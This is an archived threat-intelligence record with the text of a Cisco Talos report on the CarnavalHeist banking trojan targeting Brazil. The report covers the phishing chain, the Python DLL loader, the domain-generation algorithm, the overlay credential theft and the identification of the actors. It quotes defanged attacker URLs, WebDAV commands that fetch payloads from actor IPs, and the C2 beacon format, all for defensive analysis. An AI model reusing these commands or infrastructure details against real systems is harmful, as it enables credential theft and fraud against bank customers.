{
	"id": "0e16147c-466c-4834-ba20-b247e8a95dbe",
	"created_at": "2026-04-06T00:09:09.676964Z",
	"updated_at": "2026-04-10T03:21:53.295715Z",
	"deleted_at": null,
	"sha1_hash": "70297aa9ff3a162bab859d804704af538fc62c3f",
	"title": "New banking trojan “CarnavalHeist” targets Brazil with overlay attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1492370,
	"plain_text": "New banking trojan “CarnavalHeist” targets Brazil with overlay\r\nattacks\r\nBy Cisco Talos\r\nPublished: 2024-05-31 · Archived: 2026-04-05 20:27:01 UTC\r\nSince February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new\r\nbanking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are\r\ncommon among other banking trojans coming out of Brazil. This family has also been referenced as AllaSenha\r\nin a recent report. \r\nTalos attributes with high confidence the development and operation of CarnavalHeist to Brazilian actors who\r\ncould be identified because of some operational mistakes made during the domain registration process for their\r\npayload-hosting sites. \r\nThe current campaign uses financial-related themes in spam emails, Delphi-based DLLs, overlay attack methods,\r\nand usual input capture techniques, such as keylogging and screen capture. There are also names of traditional\r\nBrazilian banks hardcoded in the malware.  \r\nUnique to CarnavalHeist, however, is the dynamic use of a Python-based loader as part of the DLL injection\r\nprocess and the specific targeting of banking desktop applications to enable tracking of other Brazilian financial\r\ninstitutions. \r\nCarnavalHeist has Brazilian origins \r\nTalos assesses with high confidence that the CarnavalHeist malware is of Brazilian origin and primarily targets\r\nBrazilian users based on our observations of the Portuguese language being used throughout all aspects of the infection\r\nchain and the malware itself, including the use of Brazilian slang to describe some bank names, and a notable lack of\r\nother language variants thus far. The command and control (C2) infrastructure exclusively uses the BrazilSouth\r\navailability zone on Microsoft Azure to control infected machines, and they specifically target prominent Brazilian\r\nfinancial institutions.  \r\nWe further assess that the current wave of activity has been ongoing since the beginning of February based on the\r\nvolume and timeline of observable C2 domain activity, although we have observed related samples and variants that\r\nwere uploaded to VirusTotal in November and December 2023, indicating that the malware has been in development\r\nsince at least late 2023. As of May 2024, CarnavalHeist is still active, and our analysis remains ongoing as we continue\r\nto identify new samples. \r\nFinancial-themed spam as initial execution method \r\nCarnavalHeist infection begins with a financially themed unsolicited email using a fake invoice as a lure to get the user\r\nto open a malicious URL. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 1 of 17\n\nAn example unsolicited email distributing CarnavalHeist.\r\nThe malicious link uses the IS.GD URL shortener service to redirect users to the first-stage payload. The URL usually\r\nlooks similar to some of these examples: \r\nhttps://is[.]gd/38qeon?0177551.5510 \r\nhttps://is[.]gd/ROnj3W?0808482.5176 \r\nhttps://is[.]gd/a4dpQP?000324780473.85375532000 \r\nThis URL redirects the user to the server hosting the fake web page where the users are supposed to download their\r\ninvoice. We have observed different domains being used in this step, but all contain references to “Nota Fiscal\r\nEletrônica,” the Portuguese term for invoice. \r\nContent of website where user is redirected to download the malware. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 2 of 17\n\nSome of the domains we observed being used to host these pages are: \r\nhttps://notafiscaleletronica[.]nf-e[.]pro/danfe/?notafiscal=00510242.500611 \r\nhttps://nota-fiscal[.]nfe-digital[.]top/nota-estadual/?notafiscal=00792011.977347 \r\nhttps://nfe-visualizer[.]app[.]br/notas/?notafiscal=000851113082.35493424000 \r\nThe download target is the final link in this step, and it uses WebDAV to download the next-stage payload: \r\nsearch:query=NotaFiscal.pdf\u0026crumb=location:\\\\4[.]203[.]105[.]118@80\\Documentos\u0026displayname=Downloads \r\nsearch:query=NotaFiscal.pdf\u0026crumb=location:\\\\191[.]233[.]248[.]170@80\\Documentos\u0026displayname=Downloads \r\nThis command ends up downloading a LNK file, which then executes the next stage of the infection. The LNK file’s\r\nmetadata illustrates a common method threat actors use to execute malicious scripts and commands. \r\nLNK metadata used in the CarnavalHeist campaign.\r\nThe command above attempts to hide the malicious execution from the unsuspecting user. First, the text “Visualizacao\r\nindisponivel” (Portuguese for “view unavailable”) is written to a file, “NotaFiscal.pdf,” to the user’s Downloads\r\ndirectory. The PDF is then opened for viewing, meant to fool the user into thinking an actual PDF was downloaded,\r\nwhile another cmd.exe process is started minimized, and the malicious component is run.  \r\nWe have also observed multiple MSI installer-based variants, whereby the MSI file replaces the role of the LNK file\r\nand subsequent batch file, picking up in the execution chain with a variant of the first-stage Python script. In many of\r\nthe earlier variants, the actor’s Python scripts were less refined and used lower-level C-types and a more obvious\r\ninvocation of “windll.kernel32” directly in the Python script to dynamically load downstream malicious DLLs, rather\r\nthan through the more obfuscated tool offered through the “pythonmemorymodule” package seen in the execution chain\r\nof the newer samples.  \r\nIdentifying the actors behind CarnavalHeist \r\nOur analysis of the different samples for CarnavalHeist have exposed the user account used on the system where some\r\nof the samples were compiled, in addition to a GitHub account referenced in the MSI variants that appears to have been\r\nhosting the loader and banking trojan payloads at one point.  \r\nIn examining the final payload, an assert statement within the code was flagged by the compiler and project metadata\r\nwas exposed as a result. The assert we observed exposed the directory path “C:\\Users\\bert1m\\Desktop\\Meu Drive”,\r\nwith “bert1m” being the active username during the payload’s compilation. The MSI variant also refers to a GitHub\r\naccount “marianaxx0492494,” which was being used as a remote host for the files: \r\ngithub[.]com/marianaxx0492494/update/raw/main/setup.msi \r\ngithub[.]com/marianaxx0492494/update/raw/main/Execute_dll.zip \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 3 of 17\n\nThese were presumably a copy of the MSI variant itself as well a version of the loader DLL. However, at the time of our\r\ninvestigation, this user account had already been removed from GitHub, and we could not find verified samples of the\r\nfiles at those URLs. \r\nWhile this evidence by itself is not enough to identify specific actors, we found additional evidence of the actors’\r\nidentity behind the development and operation of this malware campaign. While examining the WHOIS information for\r\none of the domains hosting the initial infection, we noticed it exposed the full name and email address of the person\r\nregistering the domain.  \r\nWhois information for domain nfe-visualizer[.]app[.]br used to distribute CarnavalHeist.\r\nWe can see the username in their email is similar to the username used in the project path we have observed inside the\r\nbinary. Another important piece of information in this registry is the `ownerid`, which contains the CPF (“Cadastro de\r\nPessoa Física” or “Natural Person Registry”) of the person. The CPF works as a national ID in Brazil.  \r\nBy searching for this person name, we found a reference to a company where they were a partner, which lists part of\r\ntheir CPF above: \r\nBusiness association information for a company in Brazil showing part of the threat actor CPF.\r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 4 of 17\n\nWe also found previous companies they owned in the Brazilian state of Maranhão: \r\nCompany owned by the threat actor associated with CarnavalHeist.\r\nAnother domain used to host the initial payload is also registered in Brazil and again exposes information about the\r\nowner. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 5 of 17\n\nWhois information for a second threat actor associated with CarnavalHeist.\r\nFor this person it was easier to find more information based on their CPF, as they have criminal records, according to\r\nthe Brazilian judiciary service. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 6 of 17\n\nCriminal records for threat actor associated with CarnavalHeist.\r\nBased on this information, Talos assess with high confidence these two actors are behind the development and operation\r\nof the campaign distributing CarnavalHeist affecting Brazilian victims. \r\nAnalysis of batch file “a3.cmd” and Python loader \r\nThe file “a3.cmd” is a Windows batch file with a several layers of simple encoding and obfuscation that serves as a\r\nwrapper for installing Python on the target environment and subsequently executing a Python script that handles\r\ninjecting the second-stage payload DLL.  \r\nBatch file used in the first stage of infection.\r\nThis first layer is decoded to another shell script which downloads a Python interpreter from the official Python FTP\r\nserver and installs to a malware-created folder. \r\nPowerShell script downloading and installing Python and subsequently running the malicious loader.\r\nAfter using the downloaded Python interpreter, the batch file executes an embedded base64-encoded Python script.\r\nDecoding the base64 string embedded in the Python command reveals the final component of the cascading commands\r\nto be a loader for injecting a malicious DLL.  \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 7 of 17\n\nPython script used to download and inject the malicious banking DLL.\r\nThe script checks the processor architecture from the registry key\r\n`HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0` and bails out if the processor name value is “Broadwell.” It\r\nthen uses the function `lk()` as a domain generation algorithm (DGA) to generate a fully qualified domain (FQDN)\r\nunder the BrazilSouth region in Azure, which will be used to download the malicious DLL from. We explain the process\r\nby which this domain is generated in a section below. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 8 of 17\n\nOnce the correct FQDN has been generated, a TCP connection is opened. The script sends a UTF-8-encoded packet to\r\nthe actor’s Azure server in the format below, where the victim’s hostname, Windows version name and processor\r\narchitecture name are all passed as identifying markers: \r\n`pyCodeV1 - *NEW* {ss.gethostname()} | {Windows Product Name} | {Processor Architecture Name}` \r\nThe server then sends a response back with a byte stream containing a DLL payload named “executor.dll,” a second-stage Python script that will load the DLL and additional Python modules used to load the DLL. This data object is then\r\nreserialized within the parent Python script and executed as the next stage through Python’s `exec()` command. \r\nUsing CodePy for dynamic DLL execution \r\nThe byte stream contains a handful of components that are passed to the `exec()` command to set up the downstream\r\nexecution logic. On execution, CodePy first saves a copy of the previous Python script to the user’s public directory as\r\n“ps.txt”.\r\nNext, the script unpacks the “executor.dll” PE file and loads the resulting bytes buffer of the DLL dynamically into\r\nmemory through pythonmemorymodule’s `MemoryModule` class. Finally, the function entry point `Force` is called\r\nfrom `executor.dll` through the MemoryModule class function `get_proc_addr`. On execution, `Force` generates an up\r\nto 19-character randomized string using a similar character key string, as seen in the DGA function in the Python script.\r\n \r\nIt then selects a random directory from the system’s default user profile of the typical standard Windows folders. The\r\ninjector then checks if the system is running a 32- or 64-bit operating system and copies “mshta.exe” from the proper\r\n32-bit folder to the selected user folder, renamed with a random character string and an .exe extension.  \r\nFinally, the embedded payload, a UPX-packed banking trojan, is then extracted from a resource within executor.dll\r\nmarked as “RcDLL”. It is another Delphi-based DLL, named \"Access_PC_Client.dll\" in many of the observed samples.\r\nThe payload bytes are then written to a memory stream and injected into a spawned “mshta.exe” process.  \r\nResource present in the malicious loader DLL.\r\nFinal payload: Banking trojan DLL \r\nCarnavalHeist will attempt to steal the victim’s credentials for a variety of Brazilian financial institutions. This is\r\naccomplished through overlay attack methodologies, whereby an actor presents an overlaid window on top of the\r\nexpected legitimate application or service.  \r\nLike other Brazilian banking trojans, the malware monitors window title strings for specific word and pattern matches.\r\nWhen a window title matches, the malware sets the window to invisible and replaces it with a bundled overlay image\r\nfor the given organization. At the same time, a timer will attempt to open a new socket connection to an actor controlled\r\nC2 using another DGA function to create a separate. This DGA is distinct from the one used by the Python loader script,\r\nalthough this DGA also uses a server hosted on the BrazilSouth resource region on Azure.  \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 9 of 17\n\nCarnavalHeist possesses numerous capture capabilities, commonly associated with banking trojans, which are either\r\nexecuted automatically once a matched bank is detected, or by receiving a command from the C2.  \r\nThe protocol is a customized version of a publicly available code for a Delphi Remote Access Client, which is the same\r\nprotocol used by other banker families like Mekotio and Casbaneiro in the past. Luckily, these commands are not\r\nobfuscated and are exposed in the binary code. There is a single function processing all input from C2, and it translates\r\nto a series of IF/THEN structures for each command: \r\nSequence of commands being processed from C2 communication.\r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 10 of 17\n\nThe code supports approximately 80 commands from the C2, including keyboard capture, screenshots, video capture\r\nand remote control. They also enable the attacker to trigger specific overlay attacks to steal the login information for the\r\nbanking institutions while the user interacts with the fake login screens.  \r\nThese commands sent from the C2 and responses from the malware are all sent unencrypted through a TCP connection\r\non a random port. The commands and responses are usually enclosed in the tags shown in the code. One example of this\r\nis how the malware answers when the C2 responds to the initial connection attempt: \r\n`\u003c|Info|\u003eBANK_NAME\u003c|\u003eWindows 10 Enterprise\u003c|\u003eDESKTOP-XXXXXXX\u003c|\u003eIntel(R) Xeon(R) W-2295 CPU @\r\n3.00GHz\u003c|\u003e\u003c\u003c|` \r\nThere are also functions present in the binary that deal with remote control capabilities using AnyDesk remote desktop,\r\nwhich allows the attacker to interact with the user machine during a banking session. Some of the commands accept\r\nadditional parameters like an IP/Port to be used for the video connection or the keyboard/clipboard interaction in case of\r\nremote access. \r\nCarnavalHeist can also capture and create QR codes on demand, which is used by many banks to allow users to log in\r\nand execute transactions. This enables the attacker to redirect transactions to accounts they control instead of the\r\nintended accounts the user intended. \r\nCode showing the creation of QR code to overlay on victim's banking session.\r\nCapturing mouse and keyboard events and their key translations would expose PINs and other similar tokens for these\r\nbanks, while potentially being able to “pass through” the sign out to the legitimate service underneath the overlay, much\r\nlike a skimmer on a credit card or ATM keypad. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 11 of 17\n\nKeyboard overlay used to capture banking PIN.\r\nCarnavalHeist C2 protocol and DGA analysis \r\nCarnavalHeist uses different algorithms to generate the subdomains it uses to download payloads and communicate\r\nwith its C2 servers. These subdomains are all hosted under the BrazilSouth availability zone in Azure at “{dga}\r\n[.]brazilsouth[.]cloudapp[.]azure[.]com”.  \r\nThe DGA that generates the correct subdomains is contained within a function named `lk()` in the Python script.  \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 12 of 17\n\nFunctions implementing the DGA were used to download the banking trojan payload.\r\nIt first gets the current date and weekday values from the Python datetime module and adds their values together to\r\ngenerate an integer value. This value is used as an index to retrieve a character out of the hardcoded string\r\n`{abcdefghijlmnopqrstuvxzwkyjlmnopqabcghjl}`.  \r\nFive possible subdomain string choices are then generated and hashed by the SHA1 algorithm, followed by more string\r\nmanipulation until it is returned. A random entry from this list is then selected to generate the final FQDN. \r\nThen, a random TCP port is generated by the function `ptV5()` following a similar algorithm using the dates as a seed,\r\nand these parameters are passed to the `connect()` Python function.  \r\nThe algorithm used by the malicious DLL to generate the subdomain used for C2 communication is also based on the\r\ncurrent date and time but adds additional seeds depending on which banks are currently being accessed by the victim,\r\nwhich could be either through a web browser or a custom banking desktop application used by some banks in Brazil.\r\nThese seed values are single-hex bytes associated with each bank: \r\nTarget bank 1: 0x55 \r\nSecondary targeted banks: 0x56 \r\nAll other financial institutions: 0x57 \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 13 of 17\n\nThe DGA will then select a starting letter for the subdomain based on an array of non-ordered alpha characters like in\r\nthe Python script. It then uses the integer representations of the current day of the week, month and year, as well as the\r\ncurrent month and week of the year, to generate separate additional parts of the subdomain string through several\r\narithmetic operations.  \r\nCarnavalHeist has likely been in active development since at least November of 2023, while significant in-the-wild\r\nactivity first began in February 2024. Based on the information we had about the DGA domains and activities\r\nperformed by the Python script, Talos discovered samples in VirusTotal and Talos telemetry dating back to November\r\n2023. \r\nTracing the DGA domains from the Python script and the final payload in our DNS telemetry, we first observed in-the-wild activity on Feb. 20, 2024, with more consistent activity ramping up beginning on Feb. 11, 2024. Additional\r\nvariants of the Python loader containing slight alterations to the DGA were observed further on in our investigation.\r\nTracing all the potential domains from all the DGA variations, we can observe initial visible activity beginning in\r\nFebruary with larger spikes in actor domain activity starting in late March to the present. \r\nDNS activity for the DGA domains used by CarnavalHeist.\r\nWe assess that the actor(s) behind CarnavalHeist are of low-to-moderate sophistication. There are some aspects of the\r\ncode and malware that hint at sophistication, whether borrowed or their own, but are then short circuited or made\r\npointless by mistakes or odd choices elsewhere. For example, the DGA algorithm for some of the Python cradles goes\r\nthrough the trouble of generating a list of five different potential subdomains to be used on any given day. The list of\r\nsubdomains is then referenced by Python’s random choice function, but the subdomain list is sliced in a way that only\r\nthe last option is ever used. This is then corrected to use all choices in another version of the Python script we observed.\r\nThe actor is worth monitoring, as the ability to incorporate complexity within their malware is more concerning than the\r\ninitially observed missteps, which can always be corrected in future development iterations. The number of additional\r\nvariants we observed also suggests that the author of CarnavalHeist is actively developing it. \r\nTalos is continuing to monitor developments and analyze additional related samples and infrastructure to this actor and\r\ncampaign. \r\nMITRE ATT\u0026CK \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 14 of 17\n\nTactic  Technique \r\nInitial Access  T1566.001: Phishing: Spearphishing Attachment \r\nExecution  T1059.001: Command and Scripting Interpreter: PowerShell \r\nExecution  T1059.003: Command and Scripting Interpreter: Windows Command Shell \r\nExecution  T1059.006: Command and Scripting Interpreter: Python \r\nPersistence  T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder \r\nPrivilege Escalation  T1055.001: Process Injection: Dynamic-link Library Injection \r\nDefense Evasion  T1027.010: Obfuscated Files or Information: Command Obfuscation \r\nDefense Evasion  T1027.012: Obfuscated Files or Information: LNK Icon Smuggling \r\nDefense Evasion  T1027.009: Obfuscated Files or Information: Embedded Payloads \r\nDefense Evasion  T1036.008: Masquerading: Masquerade File Type \r\nCredential Access  T1056.001: Input Capture: Keylogging \r\nCredential Access  T1056.002: Input Capture: GUI Input Capture \r\nDiscovery  T1010: Application Window Discovery \r\nDiscovery  T1082: System Information Discovery \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 15 of 17\n\nLateral Movement  T1570: Lateral Tool Transfer \r\nCollection  T1113: Screen Capture \r\nCollection  T1125: Video Capture \r\nCommand and Control  T1102: Web Service \r\nCommand and Control  T1102.002: Web Service: Bidirectional Communication \r\nCommand and Control  T1104: Multi-Stage Channels \r\nCommand and Control  T1105: Ingress Tool Transfer \r\nCommand and Control  T1568.002: Dynamic Resolution: Domain Generation Algorithms \r\nCommand and Control  T1571: Non-Standard Port \r\nExfiltration  T1020: Automated Exfiltration \r\nExfiltration  T1041: Exfiltration Over C2 Channel \r\nExfiltration  T1567: Exfiltration Over Web Service \r\nCoverage \r\nWays our customers can detect and block this threat are listed below. \r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 16 of 17\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed\r\nin this post. Try Secure Endpoint for free here. \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these\r\nattacks. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts. \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here. \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and\r\ntests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org. \r\nThe following Snort SIDs are applicable to this threat: 63515, 63516, 63517, 63518 and 300922. \r\n The following ClamAV detections are also available for this threat: \r\nWin.Trojan.CarnavalHeist-10029766-0 \r\nLnk.Downloader.CarnavalHeist-10029991-0 \r\nWin.Dropper.CarnavalHeist-10029449-0 \r\nWin.Loader.CarnavalHeist-10029772-0 \r\nIndicators of Compromise \r\nIndicators of Compromise associated with this threat can be found here. \r\nSource: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nhttps://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/"
	],
	"report_names": [
		"new-banking-trojan-carnavalheist-targets-brazil"
	],
	"threat_actors": [],
	"ts_created_at": 1775434149,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/70297aa9ff3a162bab859d804704af538fc62c3f.pdf",
		"text": "https://archive.orkl.eu/70297aa9ff3a162bab859d804704af538fc62c3f.txt",
		"img": "https://archive.orkl.eu/70297aa9ff3a162bab859d804704af538fc62c3f.jpg"
	}
}